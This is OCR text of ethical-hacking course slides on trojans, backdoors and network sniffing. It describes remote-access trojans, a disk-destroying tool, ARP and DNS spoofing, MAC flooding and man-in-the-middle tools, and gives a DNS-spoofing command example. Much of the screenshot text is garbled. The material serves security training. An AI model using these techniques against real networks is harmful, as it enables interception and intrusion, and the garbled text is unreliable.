© Reverse WWW shel I al lows an attacker to access a 
machi ne on your i nternal network from the outside. 

© The attacker must install a simpletrojan program on a 
machine in your network, the Reverse WWW shell server. 

© On a regular basis, usually 60 seconds, the internal server 
wi 1 1 try to access the external master system to pick up 
commands. 

© I f the attacker has typed somethi ng i nto the master 
system, this command is retrieved and executed on the 
i nternal system. 

© Reverse WWW shel I uses standard http protocol . 

© 1 1 1 ooks I i ke i nternal agent i s browsi ng the web. 
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Backdoor Countermeasures 



©Most commercial ant- virus products can automatically 
scan and detect backdoor programs before they can 
cause damage (Eg. before accessing a floppy, running 
exe or download! ng mai I ) 

© An inexpensive tool called Cleaner 

(http://www.moosoft.com/cleanet.html) can identify 
and eradicate 1000 types of backdoor programs and 
trojans. 

© Educate your users not to install applications 
downloaded from the internet and e-mail attachments. 
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Tool : f Port 



1 H C:\ WINNT\Sysl:em32\cmd.eKe 








-|n| 




iMicro 


soft Uindows 2800 [Uersion 5.00 


.2195] 






<C> Copyright 1985-2008 


Microsoft Coi 


rp. 






C:\>fport -p 










— 


iFPort 


ul-33 - TCP/IP Process 


to Port 


Mapper 






iCopgright 2000 bg Founds 


tone. 


Inc . 








http: 


//wwii.f oundstone .con 










Pid 


Process 


Port 


Pro to 


Path 






408 


suchost -> 


135 


TCP 


C:SWINNT\svsten32Ssuchost .exe 






8 


Svsten -> 


139 


TCP 








632 


MS Task 


1026 


TCP 


C : \WI NNTSsysten32SMSTask . exe 






408 


suchost — >^ 


135 


UDP 


C:\UINNT\s i;stem32\suchost .exe 






8 


Svsten -> 


137 


UDP 








8 


Svsten -> 


138 


UDP 








G32 


MSTask -> 


1963 


UDP 


C : \UI NNT\systen32\MSTask . exe 






540 


rtuscan -> 


2967 


UDP 


C : \Program Files\NauNT\rt uscan . exe 






540 


rtuscan -> 


4069 


UDP 


C : SProgram FilesSNauNT\rt uscan . exe 






C:S>_ 
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ToohTCPView 



A TCP View - Sysinternals: www.sysinternals.com 



File Qstions nroQHt i\im Bflp 



One4fnh].e»fl.l3SS 

nbdWfl pee l 352 
□ tYfihwLsa.SOO 
r~l ki^r/a.»4q-1 353 

_j [Sj^slem- Pidc*5eJII 
I SysJwirt:^ 



:3728 

nmhw).*}»:776 

□ inrijnh].e»a.l3S;2 
^ r fe ii i igL.Ewe:?OT6 



TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
PCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 



TCP 

U&P 
UDP 
UD^ 
UDP 
UDP 
UDP 
UDP- 
UDP 
UPP 
U0P 
UDP- 
UOP 
UDP 
UOP 
UDP 



maiU^iTvciDKtlld^ 

niaflilap2ie5 
rrivtclv SDCQ 

mafclap2201 

mafldap irKibws-ssn 

maftlap 1?55 
ni*vlap 1J710 
rftiri:ly 117Ji 



n>&d{ 1^1027 

mflA lop 15(710 
n>6rt:lflp2ieS 



USTENIME 
U^TENING 
U&TENING 
M^TENIMIS 

USTENIMG 

U&TENINC 

USTENING 

U^TENIMCj 

tiSTENIMG 

U&TENINS 

ySTENIMG 

U^TENIMC 

ESTABLISHED 

ESTABLISHEC? 

TIME_WAJT 

U^TENINC 

y&TENING 

U&TENINe 

USTENIMG 

y&TENIMla 

JSTENING 

LISTENING 

?HiN 

[ESTABUSHED 



I 
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Process Viewer 



Process Viewer 



Fie PtocKs 

i ^ii y i 1^ ^ 



Help 



Acfobat.exe 
a[g.exe 

Expior4sr.EXE 

inetinFo.exe 

PfcView.ese 
rsvp.eMe 



Threads - IEXPLORf.EXE 



ID 



Full Path 



1796 

1020 

4Jt 

1S56 

40CK 

im 

19% 

il5S 
3%4 

464 



ID 






200 






248 






290 


15(Tirne Crik;al) 




3456 


eSNorrhall 




348 


lO(NOTmal) 




34«0 






3536 


10 (Above Nwmal) 




36*0 


SjNorrTEal) 





Nortmai 

Normal 
Normal 
Nofii^l 
NcHmal 
Nf^^rn^al 
Normal 
Norfltal 
Normal 
Noimal 
Normal 
Nomal 
Normal 
Normal 
Normal 
Nofmal 
Normal 
Normal 



Version 



d : \Program Files\Adofce\ Acrobat 5 . oy^crobat\ . , , 

D : oqr^ Fil^\ Adobe\ t oba* S . 0\£iistillr\.Ac . . , 

C : \WINDCW5\System-32\^ . esoe 

C : \ftogrft!t^ Files\CoR!fnori FilesWdobe\Wefc\A . . - 

C ; \^ND WSisy stemSS V:5rss .Jexe 

C : \S#/IND0W5^ xplorer . EJ^ 

C : \fVogranft File >\Internet Expl(wer\IE3<PLCRE . . . k 

C:\W1ND(| 

D:\P^Togra 
C:\Pfogr.s 

C:\W1NDC 
D:\E?hicd 
C:\WENDC 
C:\V/!ND<: 
C:\WINDC 
D:\hyper£ 

C:\WENDC 
r ■\!ArtMrif 



2SJ 



C) McrosoTt Corparation . 



VersiOf>mf«matian 




Fi& Version: 


6l00. 2600. OOCO Istpciien*. 01 081 74 1 48| 


Created 


8/23/2C01 etOOPM 


ModiNed: 


a/23;21K1 8:00 PM 


Cofnpariy ruame: 


Microsoft Gatporalion 


Internal name: 


e^plorei 


Ungual^: 


English (Unfted Sidles) 


Original Filenariec 


EXPLORER.EXE 


Rroducl vfersiofi: 


6lOO.2600.MCO 


De^cfipliDni: 


Windows E^cpjbret 


Piodijict Name: 


Microsoft® Windows® Oper^g System 
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I nzider - Tracks Processes and Ports 



http: / / ntsecuri ty. nu/ cgi - bi n/ down I oad/ i nzi der .exe. pi 

© This is a very useful tool that lists processes in your 
Wi ndows system and the ports each one I isten on. 

0 For instance, under Windows NT/2K, B02K injects 
itself into other processes, so it is not visible in theTask 
M anager as a separate process. 

© When you run I nzider, you will seethe port B02K has 
bound in its host process 
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http://sennaspy.cjb.net/ 

0 Senna Spy Generator 2.0 
is a trojan generator. 
Senna Spy Generator is 
abl e to create a Vi sual 
Basi c source code for a 
troj an based on a few 
options. 

© This trojan is compiled 
from generated source 
code, anything could be 
changed in it. 
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Change wallpaper 
Chat with server 
Execute DOS comrrtands 
Find flies 
FTP server 

Hang up Internet connection 
Open/close CD-Rom 
Play AVI or WAV 
Reset windows 
Send keys 



H acki ng Tool : H ard Di sk Ki 1 1 er ( H DKP4.0) 



http://www.hackology.conn/ programs/ hdkp/ginfo.shtml 

0 The Hard Drive Killer Pro series of programs offer one 
the ability to fully and permanently destroy all data on 
any given Dos or Wi n3.x/ 9x/ NT/ 2000 based system. I n 
other words 90% of the PCs worldwide. 

0 The program, once executed, wi 1 1 start eati ng up the 
hard drive, and or infect and reboot the hard drive 
withi n a few seconds. 

0 After rebooting, all hard drives attached to the system 
would be formatter (in an un recoverable manner) 
within only 1 to 2 seconds, regardlessof thesizeof the 
hard drive. 
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L J 



System File Ver i f i cati on 



©Windows 2000 introduced 
Windows File Protection 
(WFP) wliicli protects system 
f i I es that were i nstal I ed by 
Windows 2000 setup 
program from bei ng 
overwritten. 

©The hashes in this file could 
be compared with theSHA-1 
hashes of the current system 
f i I es to ver i fy thei r i ntegr i ty 
agai nst the 'factory ori gi nal s' 

©sigVerif.exe uti I ity can 
perform this verification 
process. 



B File Signature VeriHcatiDn 




To help maintain the integrity of your system, critical files 
have been digitallv signed so that any changes to these 
files can be quickly detected. 



Click Advanced to customize verification options. 
Click Start to check for any system files that are not 
digitally signed. 



Scanning files... 



5^ 












Stop 1 


Close 


1 Advanced | 
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Tool: Tripwire 



0 Tripwire will automatically calculate cryptographic 
hashes of al I key system f i I es or any f i I e that you want to 
monitor for modifications. 

© Tri pwi re software works by creati ng a basel i ne 
"snapshot" of the system 

© It will periodically scan those files, recalculate the 
information, and seeif any of the information has 
changed. If there is a change an alarm is raised. 
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Tool: Beast 



© Beast is a powerful 
Remote Admi n i strati on 
Tool (AKAtrojan) built 
with Delphi 7. 

© One of the distinct 
features of the Beast is 
that is an all-in-one 
trojan (client, server and 
server editor are stored 
in the same application). 

© An important feature of 
the server i s that i s usi ng 
the i nj ecti ng technol ogy. 
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Host Port 


127.0.0.1 




Password 


1 1 


[Go BEAST!] 



Build 
Server 



About 



Help 



Credits 



® Managers O Windows O Fun Stuff 



Files 


Appz 


Screen 




Registry ] 


[ Processes 


WebCam 



® Misci O Misc2 



Get Log "] [ Messages ] 



Info 



Passwordz Clipboard 



Disconnected 



Summary 



0 Troj ans are mal i ci ous pi eces of code that carry cracker 
software to a target system 

© Trojans are used primarily to gain and retain access on 
the target system 

© Trojans often reside deep in the system and mal<e 
registry changes that allow it to meet its purpose as a 
remote admi ni strati on tool 

© Popular Trojans include back orifice, netbus, subseven, 
beast etc. 

© Awareness and preventive measures are the best 
defense agai nst Troj ans. 
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Ethical Hacking 



Module VI I 
Sniffers 



Module Objective 



© Overview of Sniffers 

© U nderstandi ng Sniffers from a cracl<er 
perspective 

© Comprehending Active and Passive Sniffing 
© ARP Spoofing and Redirection 
© DNS and I P Sniffing and Spoofing 
© HTTPS Sniffing 

© I llustration of various tools used in the above 
context 
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Sniffers- An Introduction 



0 Sniffers monitor networl< data. 

© A sniffer can be a self-contai ned software program or a 
hardware device with the appropriate software or 
f i rmware programmi ng. 

0 Sniffers usually act as network probes or "snoops" -- 
exami ni ng network traffic but noti ntercepti ng or 
altering it. 

0 Some sniffers work only with TCP/ 1 P packets, but the 
more sophisticated tools can work with many other 
protocols and at lower levels such as the Ethernet 
frame. 
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Security Concern 



© Users of computer networks unwitti ngly disclose 
sensitive information about themselves through the use 
of insecure software, and protocols. 

© Standard implementationsof widely adopted protocols 
such as Wi ndows f i I e shari ng (CI F S/ SM B) , tel net, 
P0P3, HTTP and FTP transmit login passwords in clear 
text, exposi ng an extremely large segment of the 
internet population to sniffing- related attacks. 
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Tool: Ethereal 



# <capture> - Ethereal 



File Edit Capture Display Tools 



Help 



No. . Time 



Source 



Destination 



Protocol 



Info 



1 0.000000 SVC002. bne344d. serer- ZAMEER 



)9425 192.168.2. 



3 0. 009570 192.168. 2. 28 

4 0.061878 5VC002. bnG344d. serer- 

5 0. 061919 192.168. 2.1 

6 0.061995 192.168.2.1 

7 0. 062075 Zm££R 

8 0.080607 5VC002. bnG344d. serer- 

9 0. 080917 ZAMEER 

10 0.095069 5VC002. bnG344d. serer- 



192.168. 2.1 



192.168. 2.1 
ZAMEER 

192.168. 2. 28 
192.168. 2. 28 
SVC002 . bne344d. serer- 
ZAMEER 

SVC002 . bne344d. serer- 
ZAMEER 



HTTP Continuation 



SSDP M-SEARCH ^ HTTP/1.1 

HTTP continuation 

ICMP Destination unreachable 

ICMP Destination unreachable 

TCP 1107 > http [ACK] Seq=2141( 

HTTP Continuation 

TCP 1107 > http [ACK] Seq=2141( 

HTTP Continuation 



n: 



S Frame 2 C174 bytes on wire, 174 bytes captured) 

S Ethernet II, Src: 00 : eO :4c : 77 :12 : e7, Dst : 00 : aO : c5 :4b : 52 :f c 

S internet Protocol, src Addr : 192.168.2.28 C152 . 168. 2 . 28) , Dst Addr : 192.168.2.1 (192.168. 
S user Datagram Protocol, src Port: 3011 (3011), Dst Port: 1900 (1900) 
S Hypertext Transfer Protocol 



A 



0000 


00 


aO 


c5 


4b 


52 


fc 


00 


eO 


4c 


77 


12 


e7 


08 


00 


45 


00 


. . . KR. . . 


LW. . . . E. 


0010 


00 


aO 


f9 


68 


00 


00 


80 


11 


bb 


76 


CO 


a8 


02 


Ic 


CO 


a8 


. . .h. . . . 


.V 1 


0020 


02 


01 


Ob 


c3 


07 


6c 


00 


8c 


01 


8c 


4d 


2d 


53 


45 


41 


52 


1. . 


. .M-SEAR 


0030 


43 


48 


20 


2a 


20 


48 


54 


54 


50 


2f 


31 


2e 


31 


Od 


Oa 


48 


CH ^ HTT 


P/1.1. . H 


0040 


4f 


53 


54 


3a 


20 


32 


33 


39 


2e 


32 


35 


35 


2e 


32 


35 


35 


OST: 239 


.255.255 


0050 


2e 


32 


35 


30 


3a 


31 


39 


30 


30 


Od 


Oa 


4d 


41 


4e 


3a 


20 


.250:190 


0 . . MAN : 


0060 


22 


73 


73 


64 


70 


3a 


64 


69 


73 


63 


6f 


76 


65 


72 


22 


Od 


"ssdp : di 


scover " . 


0070 


Oa 


4d 


58 


3a 


20 


33 


Od 


Oa 


53 


54 


3a 


20 


75 


72 


6e 


3a 


.MX: 3. . 


ST: urn: 


0080 


73 


63 


68 


65 


6d 


61 


73 


2d 


75 


70 


6e 


70 


2d 


6f 


72 


67 


schemas- 


upnp-org 


0090 


3a 


73 


65 


72 


76 


69 


63 


65 


3a 


57 


41 


4e 


49 


50 


43 


6f 


: servi ce 


:WANIPCO 


OOaO 


6e 


6e 


65 


63 


74 


69 


6f 


6e 


3a 


31 


Od 


Oa 


Od 


Oa 






nnecti on 


:1 



A 



Filter 


A 


Reset 


Apply 


File: <capture> Drops: 0 
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■ r IDScenter 1.1 RC2 I 



I S.tart Snort ^ View alerts R.eset alarm Jest, settings 



X Reload 



■ Applj^ 



Main configuration 



IDScenter [General 




Main configuration 

Snort 1.9/1.8 ^ Snort 1.7 

Snort OKecutable file 

C:\IDS\snort.eKe 
[7 Show Snort console 
[7 Minimized Snort window 
|~ Don't restart Snort, if it is killed 

■Process priority 



I~ Snort service mode 



-Autostart options 

|~ Start IDScenter with Windows 
|~ Start Snort when IDScenter is started 



(* Normal 



r High 



C Realtime 



■Log folder 

Set a logging directory and standard log file 
C:\Snort\log\alert.ids 



■Log viewer 

■(* Use internal log viewer - 



<^ Standard log file C XML log file 

r Explorer URL [HTML file, ACID, SnortSnarf) 



C EKternal viewer/editor for logfiles 

(WinSnort2HTML / ACID / SnortSnarf with another browser) 
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©There are three mai n modes i n 
which Snort can be configured: 
sniffer, pacl<et logger, and networl< 
intrusion detection system. 

©Sniffer mode simply reads the 
packets off of the network and 
di splays them for you in a 
continuous stream on the console. 

©Packet logger mode logs the 
packets to the disk. 

©Network intrusion detection 
mode is the most complex and 
conf i gu r abl e conf i gu rati on , 
al lowi ng Snort to analyze network 
traffic for matches agai nst a user 
defined rule set 



Tool: Windump 



© WinDump is the porting to the Windows platform of 
tcpdump, the most used network sniffer/ analyzer for 
UNIX. 



^ C:\WINMT\System32\cmd.eKe - windump -n -S -vv 



s>uindump -n -S -vv 

I dump : listen in g on \Deyice \NPF_< F03 6 ft BE8 -5 3 D7-4C7B-B2 E4-08 2 BEF4D72 
156:53.427131 IP <tos 0x88, ttl 106, id 58655, len 108> 68.193.110. 
!. 168. 2. 162. 5000: udp 80 

156:53.493683 IP <tos 0x88, ttl 106, id 58656, len 108> 68.193.110. 
!. 168. 2. 162. 5000: udp 80 

:56:53. 506094 IP <tos 0x88, ttl 43, id 46880, len 40> 64.4.26.250.8 
.69.2446: . [tcp sun ok] 894239202 :894239202<0> ack 4229117801 win 
:56:53. 506528 IP <tos 0x88, ttl 43, id 46881, len 510> 64.4.26.250. 
1.69.2446: P 894239202 :894239672<470> ack 4229117801 win 17520 
;56:53. 508241 IP <tos 0x88, ttl 43, id 46882, len 576> 64.4.26.250. 
1.69.2446: . 894239672 :894240208<536> ack 4229117801 win 17520 
:56:53. 508465 IP <tos 0x0, ttl 128, id 19205, len 40> 192.168.2.69. 
;.250.80: . [tcp sum ok] 4229117801 :4229117801C0> ack 894240208 win 



D8> 

230.5000 > 

230.5000 > 

0 > 192.168 
17520 

80 > 192.16 

80 > 192.16 

2446 > 64.4 
16514 CDF> 



19:56:53.508602 IP <tos 0x88, ttl 43, id 46883, len 106> 64.4.26.250.80 > 192.16 
8.2.69.2446: . 894240208 :894240274<66> ack 4229117801 win 17520 

19:56:53.527161 IP <tos 0x88, ttl 107, id 30218, len 1500> 68.58.11.235.2824 > 1 
92.168.2.69.2443: . 47592813 :47594273<1460> ack 4228398193 win 8359 CDF> 
19:56:53.538245 IP <tos 0x88, ttl 106, id 58657, len 108> 68.193.110.230.5000 > 
192.168.2.162.5000: udp 80 

19:56:53.580115 IP <tos 0x88, ttl 243, id 39962, len 40> 202.87.41.115.80 > 192. 
168.2.129.2549: F [tcp sum ok] 3461109112 :3461109112<0> ack 6724698 win 8760 <DF 

l> 
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Tool: Etherpeek 



File Edit View Capture 5end Statistics Tools Window Help 





Q#| 


@ a [ 


1 il 




3.© nn 






A Warning: Alarms will not function property unless you enable Global Statistics Collection 



1 Enabled | Suspect Condition | Problem Condition | Name 




0 


> 50000000 for 5 seconds 


> 75000000 for 3 seconds 


Average Utilization (Kbits/s) 


0 


0 


> 2 for 1 seconds 


> 2 for 5 seconds 


CRC Errors 




0 


> 1 /s for 1 seconds 


> 1 0/s for 1 seconds 


DECnet Addresses Seen 




0 


> 1 for 1 seconds 


> 3 for 1 seconds 


Duplicate Addresses 


A 


0 


> 2/s for 3 seconds 


> 2/s for 7 seconds 


Errors Total 




0 


> 1 for 1 seconds 


> 5 for 1 seconds 


FTP Failed Transfers 




0 


> 1 for 1 seconds 


> 3 for 1 seconds 


Gin Attacks 




0 


> 1 for 1 seconds 


> 1 0 for 1 seconds 


ICMP Addr Mask Req 


0 


0 


> 1 for 1 seconds 


> 1 0 for 1 seconds 


ICMP Dest Unreach 




0 


> 1 for 1 seconds 


> 20 for 1 seconds 


ICMP Frag Needed 






■=■ 1 friK 1 -^pr-nnrl-^ 







0 



797 



A 780 



I© 7 



Date 



Time 



Message 



o 
o 
o 
o 
o 
o 
o 
o 



06/23/2003 



22:47:27 



hfttp://202.87.41 .1 7/lmages/lhumbnail/020/22994020.jpg from 192.1 68.2.1 66 



06/23/2003 



06/23/2003 



06/23/2003 



06/23/2003 
06/23/2003 



22:47:29 



22:47:30 



22:47:33 



22:47:33 



22:47:35 



_hfttp://207.21 7.1 1 4.56/scripts/auth.js from 1 92.1 68.2.50 

http://207.21 7.1 1 4.56/lmg/logo_eln_bl.gif from 1 92.1 6 8.2.50 
http: //64 .1 2 .1 80 .1 9/ from 1 92 .1 68 .2 .50 



hfttp://202.87.41 .1 7/lmages/lhumbnail/020/22994020.jpg from 192.1 68.2.1 66 



hfttp://cachef arm. websvs.aol.com/Wpsfte/hetscape_leftnav_2 from 1 92.1 68.2.50 



06/23/2003 



22:47:35 



http://cachefarm.websys.aol.com/dci_global/spacer from 1 92.1 68.2.50 



06/23/2003 



22:47:36 



http://cachefarm.websys.aol.eom/a/a from 192.1 68.2.50 



06/23/2003 



22:47:38 



http://202.1 44.65.7/steal/synopsis.swf from 1 92.1 68.2.1 04 



06/23/2003 



22:47:38 



http: //cachef arm. websys.aol.com/_mediaM"psite/licker.js from 1 92.1 68.2.50 



06/23/2003 



22:47:42 



http://202.87.41 .1 7/lmages/lhumbnail/023/22994023.jpg from 192.1 68.2.1 66 



06/23/2003 



22:47:54 



http: //21 6 .1 27 .80 .75/sho wthread .php?s=apostid=77591 from 1 92 .1 68 .2 .1 29 
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Passive Sniffing 




Active Sniffing 
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Ether Flood 



© Ether Flood floods a switched network with Ethernet 
frames with random hardware addresses. 

0 The effect on some switches is that they start sendi ng al I 
traffic out on all ports so that the attacker is able to sniff 
all traffic on the network. 
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^bIIII^B 

0 dsniff is a collection of tools for network auditing and 
penetration testing. 

© dsniff, filesnarf, mailsnarf, msgsnarf, urisnarf, and 
webspy passively monitor a network for interesting data 
(passwords, e-mail, files, etc.). 

0 arpspoof, dnsspoof, and macof facilitate the 

interception of network traffic normally unavailableto 
an attacker (e.g, due to layer-2 switching). 

0 sshmitm and webmitm implement active monkey-in- 
the-middle attacks against redirected SSH and HTTPS 
sessions by exploiting weak bindings in ad- hoc PKI . 
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ARP Spoofing 



2. Send fake ARP 
response to re-map 
default router IP to 
attacker's MAC 



^1 



3. Victim sends traffic 
destined for outside world 
based on poisoned ARP 
table entry 
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1 . Configure IP 
Forwarding 

4. Sniff the traffic 
from the link 



5. Packets are forwarded 
from attacker's machine 
to the actual default 
router for delivery to the 
outside world 



Sniffing HTTPS and SSH 



0 SSL connection uses a session key to encrypt all data 
sent by server and client. 

0 SSH is based on the public key encryption idea. 

0 With SSH a session key is transmitted in an encrypted 
fashion usi ng a publ ic key stored on the server. 

0 As such, these protocols - SSL and SSH are sound from 
a security standpoint. The problem however lies in the 
basi s of these protocol s - namel y trust certi f i cates and 
public keys. 
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Macof, MailSnar 



gj-Dl Konsole- root^^localliDslZ'^- Konsole 



File Sessions Sellings Help 



74ttl2Si34{0> win 512 

ed:S5t&l:21:52:39 23!dli^lc:2&:£ardS Ci.Ci*0*0*&7&7^3 > 0.0.0.0.55397: £ 1300147433: 
£300147483(0) win 512 
3dT34:3f :3a:95:3f a6:e7:34;17:el:e6 0.0,0.0.S6S0 > 0.0.0.0.W76J 3 1924679314:1 
924G79314(0> «in 512 

a:95:7e:l:ae:f8 12:fa:9b;69:ad:d2 0.0.0.0.S4&90 > 0.0.0,0.13370: S G91576310:&9l 
5763 10 (0) Win 512 

5£:bp:69:73:7d:6e 50:aF:55:75:0:^g 0.0. 0.0. 50437 > 0.0.0.0.^33059: S I0iee0^453:l 
013604^59 <0> vin 512 

3ar&3:e5:5e;3e:57 eb: 15:49:69: fa :c5 0.0.0.0.49391 > 0.0.0.0,54332: S 5772£SG03:5i 
?722a60e<0> win 512 

?7;40:7S:7c:30:3S ed:c3:4f :2b:9a:a0 0.0.0.0.S04S5 > 0,0,0.0.45185: S 265027417:2 
&502"7417(0) win 512 

if :S5tl6:l7:bd:cO 6B:d:73:6d:9b:4l 0.0.0.0.55655 > 0.0.0.0.11963: s 2100^17091:2 
£0031709140) «in 512 

B:41;4c:2d:la:bl e6:f4;20:24:ef :6d 0.0.0.0.126G6 > 0.0.0.0.47609: S 210G239290:2i 
103239290(0) uin 512 

3e:27:e9:e:4f:e3 e4:c:6f ile:4:2b 0.0.0.0.29237 > 0.0.0.0.19999: S 1932772224:193 
2772^4<0J win 512 

;l«:dd:i8 :7c: 15:53 bft:b(s:B2:3:64:55 0.0.0.0.5533 > 0.0.0.0.60955: S 1590426553:15 
90425598 (0) win 512 

!ifrfb:35:34:d:49 b7:d9:SbjSe:ec;48 0.0,0.0.40979 > 0.0.0.0.59414: S ^9835013 :56|^ 
9335013(0) win 512 



Q New I^KonsDJ* 
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0 M acof f I oods the I ocal 
network with random MAC 
addresses, causing some 
switches to fail open in 
repeating mode, and thereby 
facilitates sniffing. 

0 M ai I snarf i s capabi e of 
capturing and outputting 
SMTP mail traffic that is 
sniffed on the network. 

0url snarf is a neat tool for 
monitori ng Web traffic. 

0 Webspy al I ows the user to 
see al I the WebPages vi sited by 
the victim. 



Ettercap 



Jettercap prompt - ettercap 



C:\Prograri Files\ettercap>ettercap 
ettercap 0.6.7 <c> 2002 ALoR & NaGA 
List of available devices : 



— > [deul] 

— > [deu2] 

— > [deu3] 

— > [deu4] 

— > [deu5] 

— > [deu6] 

— > [deu7] 



E^ettercap prompt - ettercap 



ettercap 0.6.7 



1 hosts in this LA N <97.i0.i5.72 : 82. 32. 250. 0> 

E^^^KEiEEH^ES i> 97. 10.15.72 



t2!ilettercap prompt 


- ettercap 










ettercap 0.6.7 






-Help Uindow 












[qQIIFlO] - 
[return] - 
[space] - 


quit 

select the IP 
deselect the IPs 














[tab] 
[aft] 

[sS] 
[nM] 
[jJ] 
[dD] 
[xX] 
[pP] 
[fF] 
[oO] 
[cC] 
[rR] 


switch between source and dest 

flRP poisoning based sniffing 
. for sniffing on switched LAN 
. for nan-in-the-niddle technique 

IP based sniffing 

MAC based sniffing 

Only poisoning - no sniffing 

delete an entry fron the list 

Packet Forge 

run a plugin 

OS fingerprint 

passive host identification 

check for other poisoner... 

refresh the list 






[kK] 
[hH] 


save host list to a file 
this help screen 




1 Vour IP: 

Host: Unkno 


k: unknown 1 



1^— ^» I i j — ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ W f I 
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f SMACl.l [WBEMOn] 



File About 



ID 1 


Active 1 Spoofed | 


Network Adapter | 


IP Address | 


Active MAC | 


0000 


Yes 


No 


NDIS 5.0 driver 


192.163.20.114 


00-C1-26-0F-B2-72 























































































P' Show Only Active Network Adapters 
New Spoofed MAC Address 



- 


B2 


- 




- 


OD 


- 


A2 


- 


2A 



Spoofed MAC Address 



Update MAC 


Refresh 


Remove MAC 


Enit 



r 

Active MAC Address 
|00-C1-26-0F-B2-72 



KLC CONSULTING, INC 

WWW. klcconsulting. net/smac 



I Disclaimer: Use this program at your own risk. We are not responsible for any damage that might occur toyour system. This 
program is not to be used for any illegal or unethical purpose. Do not use this program if you do not agree with this disclaimer. 



M ac Changer 



0 MAC changer is a Linux uti I ity for setting a specific 
MAC address for a networl< i nterface. 

0 1 1 enables the user to set the MAC address randomly. 1 1 
allows specifying the MAC of another vendor or setting 
another MAC of the same vendor. 

0 The user can also set a MAC of the same kind (e.g.: 
wireless card). 

0 It offers a choice of vendor MAC list (more than 6200 
items) to choose from. 
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QlRIS v3.1 




□1 x| 


File View Capture Decode Filters Tools Help 


n 


J D a? - Q - 




m 


n □ 













Iris 



Links 



Help 



Done 



Capture 
Decode 

m 

Guard 
Filters 

wmm 

Logs 



Statistics 



^ Packet structure j 
a CH MAC header (Ethernet f 

g Destination: 08:00:46:( 
g Source: 00:06:29:CF:A 
^ Type: 08-00 DoD IP 
□ IPv4 header 



Capture 



Packet Decoder 



- + X 



Version = 4 

Header length = 5 (20 I 
Type of service = 00 

fimS 000 = 0 Low pr 

fimS ...0.... = Normal d( 
fiori] ....0... = Normal th — I 

fiori] 0.. = Normal re 

Total length = 40 byte^ 
Identification = 43470 
Flags 

Ml 0 unused = ( 

fiori] .1 Don't fragr 



K =ii-iri.^^J 

11 



No. I MAC source addr | MAC dest. addr | Frame | Protocol 



id 



113 


IBM-cPa677 


SONY-0d53e9 


IP 


TCP->NETBIOS-SSN 


114 


SONV-0d53e9 


IBM-cfa677 


IP 


TCP->NETBIOS-SSN 


115 


IBM-cfa677 


SONY-0d53e9 


IP 


TCP->NETBIOS-SSN 


116 


SONV-0d53e9 


IBM-cfa677 


IP 


TCP->NETBIOS-SSN 


117 


IBM-cfa677 


SONY-0d53e9 


IP 


TCP->NETBIOS-SSN 


118 


SONV-0d53e9 


IBM-cfa677 


IP 


TCP->NETBIOS-SSN 


119 


IBM-cfa677 


SONY-0d53e9 


IP 


TCP->NETBIOS-SSN 


120 


00:80:29:00:3F:BC 


Broadcast 


802.3 


IPX 


121 


00:80:29:00:3F:BC 


Broadcast 


802.3 


IPX 


122 


00:80:29:00:3F:BC 


Broadcast 


802.3 


IPX 


123 


00:80:29:00:3F:BC 


Broadcast 


802.3 


IPX 



0000 08 00 46 OD 53 E9 00 06 29 CF A6 77 08 00 45 00 . . F. S 

0010 00 28 A9 CE 40 00 80 06 CC El CO A8 01 C8 CO A8 . 

0020 01 07 09 7F 00 8E FO 45 64 ED 2A F9 6A FO 50 11 . .□. . 

0030 3F F9 F6 C3 00 00 00 00 00 00 00 00 ?uoA. 



This is the packet editor window. You can bring a packet here by clicking one in packets list or you can create 3 
Q a new one by clicking on [Zl button. This editor supports the usual edit commands met in standard editors ^ | 

|CPU: 1% I 123/2000 |IP: 192.168.1.7 MAC: 08:00:46:0D:53:E9 \BS Intel 82^ ^ 
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N eti intercept 



^^NeUntercept - lastthursday - default_prDNIe - cap1.sandstDrm.net 



RIe Forensics Fornnat Help 



B D - 

Ne-^ Open Delete 
Traffic j Summary 
Search 



Print 



± ± \ m 

import E?^port Report 
Forensics | /ijerts ] Vle-^s ] Configuration 
Search 



m « 

Rnd # Mask 



Save Revert 



It? 

What -"s this? 



SRC IP Address [ 



12. 0.44. 2 
12. 129. 13. 30 
17. 254. 0. 151 
18. 7. 16. 67 
18. 7. 16. 74 
18. 24. 10. 25 
18. 24. 10. 26 
18. 26. 0. 36 
18. 55. 0. 234 
24.48. 30. 2 



^P.A 



i 



Inv 



DST IP Address 



12. 127. 16. 70 
12. 129. 146. 51 
18. 7. 16. 67 
18. 24. 10. 26 
18. 24. 10. 177 
18. 24. 10. 179 
18. 26. 0. 18 
18. 26. 0. 36 
18. 26.4. 10 
18. 70. 0. 160 
1 fi 1 1 1 n ^ 



dlr_ 



0: 



^i 



inv 



Search 



File Name 



jjiL-SLL|e.3-y j-tiU. L|±l 
/imagres/resl . gfif 
/ m.s.g&s/r&s2 . gfif 
/im5Lgfe£/re£3 . gfif 

/ image s/s idle, gf if 

/ image s/ sp e c ial_o 

/ image s/ top 2 0_neyr 

/ image s/ts_lo go . g 

/ijfiterest/ 

/ j s . ng/ s ite =he ral 
^11 >■ 



inv 



Search 



tJser Name 



^ail 

^ap = s ands to m-ni 

^att 

net 

ni 

owne r- f r e eb s d-hac! 

owner-f reebsd-ne t 

pete 

philip 

rickl 



inv 



Search 



Content Type 



FIHUWOiOJ 
Fijciger 
Flash 
FTP 

FTP data 
GIF 

Gnutella 
GSip 
HTML 
HTTP 



1^ 



i 



J 



/iJi 



inv 



12002- 


NOV-21 15:50:00 ^ <|[> 




<||>| 2002 -NOV-21 


16:10:00 ^ 


Min Suretj^: 


0 ij 


Querj^: 


Save 


Load 1 Delete 


Columns: 


Clear M 


Balance Columns | 


Criteria ^ j 


3& Find Connections 



DNS Sniffing and Spoofing 



© DNS Spoofing is said to have occurred when a DNS 
entry poi nts to another I P i nstead of the legiti mate I P 
address. 

© When an attacker wants to poison a DNS cache, he will 
use a faulty DNS - which can be his own domain 
running a hacked DNS server. The DNS server is 
termed as hacked because the I P address records are 
manipulated to suit the attacker's needs. 
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WinDNSSpoof 



© This tool is a simple DNS I D Spoofer for Windows 
9X/2K. 

0 I n order to use it you must be able to sniff traffic of the 
computer bei ng attacked. 

© Usage: wds-h 

Example : wds -n www.microsoft.com -i 216.239.39.101 
-g 00-00-39- 5c-45-3b 



Bl-Council 



Summary 



0 A sniffer i s a pi ece of software that captures the traff i c 
flowi ng i nto and out of a computer attached to a 
network. 

0 A sniffer attack is commonly used to grab logins and 
